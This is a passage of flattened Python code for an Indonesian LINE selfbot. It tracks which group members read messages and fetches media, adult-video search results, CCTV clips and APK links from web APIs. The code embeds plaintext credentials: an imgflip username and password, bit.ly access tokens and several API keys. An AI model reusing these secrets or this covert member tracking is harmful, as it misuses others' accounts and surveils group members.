elapsed_time = time.time() - start2
ki.sendText(msg.to, "%s" % (elapsed_time))
start3 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start3
kk.sendText(msg.to, "%s" % (elapsed_time))
start4 = time.time()
sw.sendMessage("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start4
kc.sendText(msg.to, "%s" % (elapsed_time))
start5 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start5
km.sendText(msg.to, "%s" % (elapsed_time))
start6 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start6
kb.sendText(msg.to, "%s" % (elapsed_time))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['readPoint'][msg.to] = msg_id
Setmain['readMember'][msg.to] = {}
cl.sendText(msg.to, "「 Status Lurking 」\nBerhasil diaktifkan, selanjutnya ketik lurkers\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['readPoint'][msg.to]
del Setmain['readMember'][msg.to]
cl.sendText(msg.to, "「 Status Lurking 」\nBerhasil dimatikan\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
elif cmd == "lurkers":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in Setmain['readPoint']:
if Setmain['readMember'][msg.to] != {}:
aa = []
for x in Setmain['readMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " 「 Daftar Member 」 \n\n 「 Total {} Sider 」\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
try:
del Setmain['readPoint'][msg.to]
del Setmain['readMember'][msg.to]
except:
pass
Setmain['readPoint'][msg.to] = msg.id
Setmain['readMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "「 Status Sider 」\nBerhasil diaktifkan\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "「 Status Sider 」\nBerhasil dimatikan\n\n• Jam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"+"\n• Tanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d'))
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========ENTERTAINMENT============#
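# The commands below call third-party web APIs with hard-coded endpoints and API keys;
# they may stop working if those services change or the keys expire.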
elif cmd.startswith("get-audio "):
if msg._from in admin:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " "," ")
cond = query.split("|")
search = str(cond[0])
with requests.session() as web:
web.headers["User-Agent"] = "Mozilla/5.0"
result = web.get("https://farzain.xyz/api/premium/yt_search.php?apikey=apikey_saintsbot&id={}".format(str(search)))
data = result.text
data = json.loads(data)
if len(cond) == 1:
if data["respons"] != []:
num = 0
ret_ = "「 Pencarian Audio 」\n"
for res in data["respons"]:
num += 1
ret_ += "\n {}. {}".format(str(num), str(res['title']))
ret_ += "\n\n Total {} Result".format(str(len(data["respons"])))
cl.sendMessage(msg.to, str(ret_))
cl.sendText(to, "Ketik Get-yt {} | angka\nuntuk melihat detail lagu".format(str(search)))
if len(cond) == 2:
num = int(cond[1])
if num <= len(data["respons"]):
res = data["respons"][num - 1]
with requests.session() as web:
web.headers["User-Agent"] = "Mozilla/5.0"
result = web.get("http://rahandiapi.herokuapp.com/youtubeapi?key=betakey&q=https://www.youtube.com/watch?v={}".format(str(res['video_id'])))
data = result.text
data = json.loads(data)
ret_ = "「 Detail Lagu 」\nTitle : "+data['result']['title']
ret_ += "\nLikes : "+str(data['result']['likes'])
ret_ += "\nDislikes : "+str(data['result']['dislikes'])
ret_ += "\nDuration : "+str(data['result']['duration'])
ret_ += "\nRating : "+str(data['result']['rating'])
ret_ += "\nAuthor : "+str(data['result']['author'])+"\n"
cover = data['result']['thumbnail']
if data["result"]["audiolist"] != []:
for koplok in data["result"]["audiolist"]:
ret_ += "\nType : "+koplok['extension']
ret_ += "\nResolusi : "+koplok['resolution']
ret_ += "\nSize : "+koplok['size']
ret_ += "\nLink : "+koplok['url']
if koplok['resolution'] == '50k':
audio = koplok['url']
cl.sendImageWithURL(msg.to,cover)
cl.sendMessage(msg.to, str(ret_))
cl.sendAudioWithURL(msg.to,audio)
elif cmd.startswith("get-fs "):
if msg._from in admin:
sep = msg.text.split(" ")
anu = msg.text.replace(sep[0] + " "," ")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("https://farzain.xyz/api/premium/fs.php?apikey=apikey_saintsbot&id={}".format(urllib.parse.quote(anu)))
data = r.text
data = json.loads(data)
if data["status"] == "success":
ret_ = data["url"]
cl.sendImageWithURL(msg.to,ret_)
else:
cl.sendMessage(msg.to, "Error")
elif cmd.startswith("get-post "):
if msg._from in admin:
sep = msg.text.split(" ")
post = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = s.get("http://m.jancok.com/klik/{}/".format(urllib.parse.quote(post)))
soup = BeautifulSoup(r.content, 'html5lib')
ret_ = '「 Get Postingan 」\n\n'
try:
for title in soup.select("[class~=badge-item-title]"):
ret_ += "• Judul : "+title.get_text()
ret_ += "\n• Link : m.jancok.com"
for link in soup.find_all('img',limit=1):
cl.sendMessage(msg.to, ret_)
cl.sendImageWithURL(msg.to, link.get('src'))
except Exception as e:
cl.sendMessage(msg.to, "Post kosong")
print(str(e))
elif cmd.startswith("get-line "):
if msg._from in admin:
sep = text.split(" ")
user = text.replace(sep[0] + " ","")
conn = cl.findContactsByUserid(user)
try:
anu = conn.mid
dn = conn.displayName
bio = conn.statusMessage
sendMention(to, anu, "「 Contact Line ID 」\n• Nama : ", "\n• Nick : "+dn+"\n• Bio : "+bio+"\n• Contact link : http://line.me/ti/p/~"+user)
cl.sendContact(to, anu)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("invite: "):
if msg._from in admin:
sep = text.split(" ")
idnya = text.replace(sep[0] + " ","")
conn = cl.findContactsByUserid(idnya)
cl.findAndAddContactsByMid(conn.mid)
cl.inviteIntoGroup(msg.to,[conn.mid])
group = cl.getGroup(msg.to)
xname = cl.getContact(conn.mid)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Diinvite 」\nNama contact '
recky = str(xname.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':xname.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan+ zxc + "ke grup " + str(group.name) +""
cl.sendMessage(receiver, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd.startswith("listmeme"):
if msg._from in admin:
proses = text.split(" ")
keyword = text.replace(proses[0] + " ","")
count = keyword.split("|")
search = str(count[0])
r = requests.get("http://api.imgflip.com/get_memes")
data = json.loads(r.text)
if len(count) == 1:
no = 0
hasil = "「 Daftar Meme Image 」\n"
for aa in data["data"]["memes"]:
no += 1
hasil += "\n" + str(no) + ". "+ str(aa["name"])
hasil += " "
ret_ = "\n\nSelanjutnya ketik:\nListmeme | angka\nGet-meme text1 | text2 | angka"
cl.sendText(msg.to,hasil+ret_)
if len(count) == 2:
try:
num = int(count[1])
gambar = data["data"]["memes"][num - 1]
hasil = "{}".format(str(gambar["name"]))
sendMention(msg.to, msg._from,"「 Meme Image 」\nTunggu ","\nFoto sedang diproses...")
cl.sendText(msg.to,hasil)
cl.sendImageWithURL(msg.to,gambar["url"])
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-meme "):
if msg._from in admin:
proses = text.split(" ")
keyword = text.replace(proses[0]+" ","")
query = keyword.split("|")
atas = query[0]
bawah = query[1]
r = requests.get("https://api.imgflip.com/get_memes")
data = json.loads(r.text)
try:
num = int(query[2])
namamem = data["data"]["memes"][num - 1]
meme = int(namamem["id"])
api = pyimgflip.Imgflip(username='andyihsan', password='ihsan848')
result = api.caption_image(meme, atas,bawah)
sendMention(msg.to, msg._from,"「 Meme Image 」\nTunggu ","\nFoto sedang diproses...")
cl.sendImageWithURL(msg.to,result["url"])
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-gif "):
if msg._from in admin:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("|")
search = str(count[0])
r = requests.get("https://api.tenor.com/v1/search?key=PVS5D2UHR0EV&limit=10&q="+str(search))
data = json.loads(r.text)
if len(count) == 1:
no = 0
hasil = "「 Pencarian Gif 」\n"
for aa in data["results"]:
no += 1
hasil += "\n" + str(no) + ". " + str(aa["title"])
ret_ = "\n\nSelanjutnya Get-gif {} | angka\nuntuk melihat detail video".format(str(search))
cl.sendText(msg.to,hasil+ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["results"][num - 1]
c = str(b["id"])
hasil = "Informasi gif ID "+str(c)
hasil += "\n"
cl.sendText(msg.to,hasil)
dl = str(b["media"][0]["loopedmp4"]["url"])
cl.sendVideoWithURL(msg.to,dl)
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-xxx "):
if msg._from in admin:
proses = text.split(" ")
urutan = text.replace(proses[0] + " ","")
count = urutan.split("|")
search = str(count[0])
r = requests.get("https://api.avgle.com/v1/search/{}/1?limit=10".format(str(search)))
data = json.loads(r.text)
if len(count) == 1:
no = 0
hasil = "「 Pencarian Video 18+ 」\n"
for aa in data["response"]["videos"]:
no += 1
hasil += "\n"+str(no)+". "+str(aa["title"])+"\nDurasi : "+str(aa["duration"])
ret_ = "\n\nSelanjutnya Get-xxx {} | angka\nuntuk melihat detail video".format(str(search))
cl.sendText(msg.to,hasil+ret_)
elif len(count) == 2:
try:
num = int(count[1])
b = data["response"]["videos"][num - 1]
c = str(b["vid"])
d = requests.get("https://api.avgle.com/v1/video/"+str(c))
data1 = json.loads(d.text)
hasil = "Judul "+str(data1["response"]["video"]["title"])
hasil += "\n\nDurasi : "+str(data1["response"]["video"]["duration"])
hasil += "\nKualitas HD : "+str(data1["response"]["video"]["hd"])
hasil += "\nDitonton "+str(data1["response"]["video"]["viewnumber"])
e = requests.get("https://api-ssl.bitly.com/v3/shorten?access_token=c52a3ad85f0eeafbb55e680d0fb926a5c4cab823&longUrl="+str(data1["response"]["video"]["video_url"]))
data2 = json.loads(e.text)
hasil += "\nLink video : "+str(data1["response"]["video"]["video_url"])
hasil += "\nLink embed : "+str(data1["response"]["video"]["embedded_url"])
hasil += "\n\nKalau tidak bisa jangan lupa pakai vpn kesayangan anda"
cl.sendText(msg.to,hasil)
anuanu = str(data1["response"]["video"]["preview_url"])
path = cl.downloadFileURL(anuanu)
cl.sendImage(msg.to,path)
cl.sendVideoWithURL(msg.to, str(data1["response"]["video"]["video_url"]))
except Exception as e:
cl.sendText(msg.to," "+str(e))
elif cmd.startswith("get-sholat "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "「 Jadwal Sholat 」\n"
ret_ += "\n「✭」 Lokasi : " + data[0]
ret_ += "\n「✭」 " + data[1]
ret_ += "\n「✭」 " + data[2]
ret_ += "\n「✭」 " + data[3]
ret_ += "\n「✭」 " + data[4]
ret_ += "\n「✭」 " + data[5]
ret_ += "\n\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
ret_ += "\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-cuaca "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "「 Status Cuaca 」\n"
ret_ += "\n「✭」 Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\n「✭」 Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\n「✭」 Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\n「✭」 Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\n「✭」 Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
ret_ += "\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-lokasi "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "「 Info Lokasi 」"
ret_ += "\n「✭」 Location : " + data[0]
ret_ += "\n「✭」 Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
elif cmd.startswith("lirik "):
if msg._from in admin:
data = msg.text.lower().replace("lirik ","")
artis = data.split('|')
artis = artis[1].replace(' ','_')
judul = data.split('|')
judul = judul[2].replace(' ','_')
with requests.session() as s:
s.headers['user-agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = s.get("https://www.wowkeren.com/lirik/lagu/{}/{}.html".format(urllib.parse.quote(artis), judul))
x = s.get("https://www.wowkeren.com/seleb/{}/lirik.html".format(urllib.parse.quote(artis)))
data = BeautifulSoup(r.content, 'html5lib')
data1 = BeautifulSoup(x.content, 'html5lib')
ret_ = ''
try:
yyk = data1.select("[class~=content]")[1].text
yoyok = yyk.replace(" ", " ")
ret_ += " 「 Informasi Penyanyi 」"+yoyok
ret = data.find("div", id="JudulHalaman")
ret_ += "Judul lagu : "+ret.get_text()
ret_ += "\n\n 「 Lirik Lagunya 」"+data.select("[class~=GambarUtama]")[1].text
for link in data1.findAll('div', attrs={'class':'item'}):
cl.sendImageWithURL(msg.to, "https://www.wowkeren.com"+link.find('img')['src'])
cl.sendMessage(to, ret_)
except:
cl.sendMessage(to, "lirik tidak tersedia")
elif cmd.startswith("get-lirik "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
url = "http://rahandiapi.herokuapp.com/lyricapi?key=betakey&q={}".format(urllib.parse.quote(search))
start = time.time()
link = web.get(url)
elapsed = time.time() - start
data = link.text
data = json.loads(data)
ret_ = "「 Lirik Search 」"
ret_ += "\n「✭」 Judul : {}".format(str(data["title"]))
ret_ += "\n「✭」 Time Taken : {:.3f} detik".format(elapsed)
ret_ += "\n\n{}".format(str(data["lyric"]))
cl.sendText(msg.to, str(ret_))
elif cmd.startswith("musik "):
if msg._from in admin:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " ","")
cond = query.split("-")
search = str(cond[0])
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
result = web.get("http://api.ntcorp.us/joox/search?q={}".format(str(search)))
data = result.text
data = json.loads(data)
if len(cond) == 1:
num = 0
ret_ = "「 Pencarian Musik 」\n"
for music in data["result"]:
num += 1
ret_ += "\n {}. {}".format(str(num), str(music["single"]))
ret_ += "\n\n「 Total {} Pencarian 」".format(str(len(data["result"])))
cl.sendMessage(to, str(ret_))
sendMention(msg.to, msg._from,"","\nJika ingin menggunakan,\nSilahkan gunakan:\n\nMusik penyanyi-angka")
if len(cond) == 2:
num = int(cond[1])
if num <= len(data["result"]):
music = data["result"][num - 1]
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
result = web.get("http://api.ntcorp.us/joox/song_info?sid={}".format(str(music["sid"])))
data = result.text
data = json.loads(data)
if data["result"] != []:
ret_ = "「 Pencarian Musik 」"
ret_ += "\n• Judul : {}".format(str(data["result"]["song"]))
ret_ += "\n• Album : {}".format(str(data["result"]["album"]))
ret_ += "\n• Ukuran : {}".format(str(data["result"]["size"]))
ret_ += " \n• Link Musik : {}".format(str(data["result"]["mp3"]))
ret_ += "\n「 Tunggu Musiknya Keluar 」"
cl.sendImageWithURL(to, str(data["result"]["img"]))
cl.sendMessage(to, str(ret_))
cl.sendAudioWithURL(to, str(data["result"]["mp3"][0]))
elif cmd.startswith("kode wilayah"):
if msg._from in admin:
ret_ = "「 Daftar Kode Wilayah 」\n\n"
ret_ += "248 = Alternatif - Cibubur\n119 = Ancol - bandara\n238 = Asia afrika - Bandung\n169 = Asia afrika - Hang lekir"
ret_ += "\n276 = Asia afrika - Sudirman\n295 = Bandengan - kota\n294 = Bandengan - Selatan\n255 = Boulevard Barat raya"
ret_ += "\n102 = Buncit raya\n272 = Bundaran - HI\n93 = Cideng barat\n289 = Cikini raya\n242 = Ciledug raya - Cipulir"
ret_ += "\n175 = Ciloto - Puncak\n142 = Daan mogot - Grogol\n143 = Daan mogot - Pesing\n338 = Dewi sartika - Cawang"
ret_ += "\n124 = DI Panjaitan - By pass\n123 = DI Panjaitan - Cawang\n13 = Dr Satrio - Casablanca\n105 = Dr Satrio - Karet"
ret_ += "\n245 = Dukuh atas - MRT Jakarta\n334 = Fachrudin raya\n252 = Fatmawati - Blok A\n253 = Fatmawati - Cipete raya"
ret_ += "\n203 = Flyover Daan mogot\n336 = Flyover Jati baru\n172 = Flyover Senen - Kramat\n77 = Gunung sahari"
ret_ += "\n137 = Hasyim Ashari\n273 = Jalan MH Thamrin\n327 = Jalan RS Fatmawati\n292 = Jl. Otista 3\n333 = Jl. Panjang - Kebon jeruk"
ret_ += "\n226 = JORR - Bintaro\n227 = JORR - Fatmawati\n173 = Kramat raya - Senen\n117 = Kyai Caringin - Cideng\n126 = Letjen Suprapto - Senen"
ret_ += "\n204 = Mangga besar\n319 = Margaguna raya\n326 = Margonda raya\n310 = Mas Mansyur - Karet\n309 = Mas Mansyur - Tn. Abang"
ret_ += "\n64 = Matraman\n140 = Matraman - Salemba\n284 = Metro Pdk. Indah\n191 = MT Haryono - Pancoran\n160 = Pancoran barat"
ret_ += "\n331 = Pejompongan - Slipi\n332 = Pejompongan - Sudirman\n312 = Perempatan pramuka\n171 = Permata hijau - Panjang\n99 = Petojo Harmoni"
ret_ += "\n223 = Pramuka - Matraman\n222 = Pramuka raya\n314 = Pramuka raya - jl. Tambak\n313 = Pramuka - Salemba raya\n130 = Puncak raya KM84"
ret_ += "\n318 = Radio dalam raya\n328 = RS Fatmawati - TB\n274 = Senayan city\n132 = Slipi - Palmerah\n133 = Slipi - Tomang"
ret_ += "\n162 = S Parman - Grogol\n324 = Sudirman - Blok M\n18 = Sudirman - Dukuh atas\n325 = Sudirman - Semanggi\n112 = Sudirman - Setiabudi"
ret_ += "\n246 = Sudirman - Thamrin\n320 = Sultan agung - Sudirman\n100 = Suryo pranoto\n220 = Tanjung duren\n301 = Tol kebon jeruk"
ret_ += "\n41 = Tomang/Simpang\n159 = Tugu Pancoran\n145 = Warung jati - Pejaten\n205 = Yos Sudarso - Cawang\n206 = Yos Sudarso - Tj. Priuk"
ret_ += "\n\nUntuk melihat cctv,\nKetik lihat (kode wilayah)"
cl.sendMessage(to, ret_)
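# "lihat <kode wilayah>": scrape lewatmana.com for the CCTV stream of the chosen area and send the clip.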
elif cmd.startswith("lihat "):
if msg._from in admin:
sep = msg.text.split(" ")
cct = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
r = s.get("http://lewatmana.com/cam/{}/bundaran-hi/".format(urllib.parse.quote(cct)))
soup = BeautifulSoup(r.content, 'html5lib')
try:
ret_ = "「 Informasi CCTV 」\nDaerah "
ret_ += soup.select("[class~=cam-viewer-title]")[0].text
ret_ += "\nCctv update per 5 menit"
vid = soup.find('source')['src']
ret = "Untuk melihat wilayah lainnya, Ketik kode wilayah"
cl.sendMessage(to, ret_)
cl.sendVideoWithURL(to, vid)
cl.sendMessage(to, ret)
except:
cl.sendMessage(to, "Data cctv tidak ditemukan!")
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
shi = bestaudio.url
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n┃ Author : ' + str(vid.author)
durasi = '\n┃ Duration : ' + str(vid.duration)
suka = '\n┃ Likes : ' + str(vid.likes)
rating = '\n┃ Rating : ' + str(vid.rating)
deskripsi = '\n┃ Deskripsi : ' + str(vid.description)
cl.sendImageWithURL(msg.to, me)
cl.sendAudioWithURL(msg.to, shi)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n┃ Author : ' + str(vid.author)
durasi = '\n┃ Duration : ' + str(vid.duration)
suka = '\n┃ Likes : ' + str(vid.likes)
rating = '\n┃ Rating : ' + str(vid.rating)
deskripsi = '\n┃ Deskripsi : ' + str(vid.description)
cl.sendVideoWithURL(msg.to, me)
cl.sendText(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
cl.sendText(msg.to,str(e))
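# "get-image <query>": ask the rahandiapi image endpoint for results and send one random image.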
elif cmd.startswith("get-image "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
url = "http://rahandiapi.herokuapp.com/imageapi?key=betakey&q={}".format(urllib.parse.quote(search))
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get(url)
data = r.text
data = json.loads(data)
if data["result"] != []:
start = timeit.timeit()
items = data["result"]
path = random.choice(items)
a = items.index(path)
b = len(items)
cl.sendText(msg.to,"「 Google Image 」\nType : Search Image\nTime taken : %seconds" % (start))
cl.sendImageWithURL(msg.to, str(path))
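# "get-apk <nama>" lists APKPure search results; "get-apk <nama> | <angka>" opens that result's
# download page and replies with the file info plus a bit.ly-shortened download link.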
elif cmd.startswith("get-apk "):
if msg._from in admin:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " ","")
cond = query.split("|")
search = str(cond[0])
with requests.session() as s:
s.headers['user-agent'] = random.choice(settings["userAgent"])
r = s.get("https://apkpure.com/id/search?q={}".format(str(search)))
soup = BeautifulSoup(r.content, 'html5lib')
data = soup.findAll('dl', attrs={'class':'search-dl'})
if len(cond) == 1:
num = 0
ret_ = "「 Pencarian Aplikasi 」\n"
for apk in data:
num += 1
link = "https://apkpure.com"+apk.find('a')['href']
title = apk.find('a')['title']
ret_ += "\n {}. {}".format(str(num), str(title))
ret_ += "\n\n Total {} Result".format(str(len(data)))
ret = "Selanjutnya ketik:\nGet-apk {} | angka".format(str(search))
cl.sendMessage(to, str(ret_))
cl.sendMessage(to, str(ret))
elif len(cond) == 2:
num = int(cond[1])
if num <= len(data):
apk = data[num - 1]
with requests.session() as s:
s.headers['user-agent'] = random.choice(settings["userAgent"])
r = s.get("https://apkpure.com{}/download?from=details".format(str(apk.find('a')['href'])))
soup = BeautifulSoup(r.content, 'html5lib')
data = soup.findAll('div', attrs={'class':'fast-download-box'})
for down in data:
load = down.select("a[href*=https://download.apkpure.com/]")[0]
file = load['href']
ret_ = "File info :\n"+down.find('span', attrs={'class':'file'}).text
with requests.session() as web:
web.headers["user-agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = web.get("https://api-ssl.bitly.com/v3/shorten?access_token=497e74afd44780116ed281ea35c7317285694bf1&longUrl={}".format(urllib.parse.quote(file)))
data = r.text
data = json.loads(data)
ret_ += "\nLink Download :\n"+data["data"]["url"]
cl.sendMessage(to, str(ret_))
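# "get-anime <judul>": query the Kitsu API, translate each TV entry's synopsis to Indonesian,
# and send the poster plus release date, rating, and synopsis.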
elif cmd.startswith("get-anime "):
if msg._from in admin:
sep = msg.text.split(" ")
anime = msg.text.replace(sep[0] + " ","")  # keep the raw query; urllib.parse.quote encodes it below
with requests.session() as web:
web.headers["user-agent"] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = web.get("https://kitsu.io/api/edge/anime?filter[text]={}".format(urllib.parse.quote(anime)))
data = r.text
data = json.loads(data)
ret_ = ''
if data["data"] != []:
for a in data["data"]:
if a["attributes"]["subtype"] == "TV":
sin = a["attributes"]["synopsis"]
translator = Translator()
hasil = translator.translate(sin, dest='id')
sinop = hasil.text
ret_ += '「 Anime {} 」'.format(str(a["attributes"]["canonicalTitle"]))
ret_ += '\n• Rilis : '+str(a["attributes"]["startDate"])
ret_ += '\n• Rating : '+str(a["attributes"]["ratingRank"])
ret_ += '\n• Type : '+str(a["attributes"]["subtype"])
ret_ += '\n• Sinopsis :\n'+str(sinop)
ret_ += '\n\n'
cl.sendImageWithURL(msg.to, str(a["attributes"]["posterImage"]["small"]))
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-zodiak "):
if msg._from in admin:
sep = msg.text.split(" ")
query = text.replace(sep[0] + " ","")
